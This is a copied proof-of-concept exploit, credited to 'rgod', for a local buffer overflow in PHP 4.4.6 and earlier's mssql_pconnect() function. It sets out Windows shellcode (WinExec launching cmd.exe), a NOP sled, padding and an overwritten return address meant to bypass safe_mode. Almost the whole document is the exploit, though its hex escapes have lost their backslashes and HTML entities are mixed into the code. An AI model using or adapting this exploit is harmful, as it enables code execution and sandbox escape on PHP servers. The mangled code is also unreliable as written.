PHP <= 4.4.6 mssql_[p]connect() Local Buffer Overflow Exploit

<?php //&nbsp;PHP&nbsp;<=&nbsp;4.4.6&nbsp;mssql_connect()&nbsp;&&nbsp;mssql_pconnect()&nbsp;local&nbsp;buffer&nbsp;overflow //&nbsp;poc&nbsp;exploit&nbsp;(and&nbsp;safe_mode&nbsp;bypass) //&nbsp;windows&nbsp;2000&nbsp;sp3&nbsp;en&nbsp;/&nbsp;seh&nbsp;overwrite //&nbsp;by&nbsp;rgod //&nbsp;site:&nbsp;http://retrogod.altervista.org //&nbsp;u&nbsp;can&nbsp;easily&nbsp;adjust&nbsp;for&nbsp;php5 //&nbsp;this&nbsp;as&nbsp;my&nbsp;little&nbsp;contribute&nbsp;to&nbsp;MOPB $____scode= \"xebx1b\". \"x5b\". \"x31xc0\". \"x50\". \"x31xc0\". \"x88x43x59\". \"x53\". \"xbbxcax73xe9x77\".&nbsp;//WinExec \"xffxd3\". \"x31xc0\". \"x50\". \"xbbx5cxcfxe9x77\".&nbsp;//ExitProcess \"xffxd3\". \"xe8xe0xffxffxff\". \"x63x6dx64\". \"x2e\". \"x65\". \"x78x65\". \"x20x2f\". \"x63x20\". \"start&nbsp;notepad&nbsp;&&nbsp;\"; &nbsp;&nbsp;&nbsp;$eip=\"xdcxf5x12\"; &nbsp;&nbsp;&nbsp;$____suntzu=str_repeat(\"x90\",100); &nbsp;&nbsp;&nbsp;$____suntzu.=$____scode; &nbsp;&nbsp;&nbsp;$____suntzu.=str_repeat(\"a\",2460&nbsp;-&nbsp;strlen($____scode)); &nbsp;&nbsp;&nbsp;$____suntzu.=$eip; &nbsp;&nbsp;&nbsp;mssql_pconnect($____suntzu); ?> &nbsp;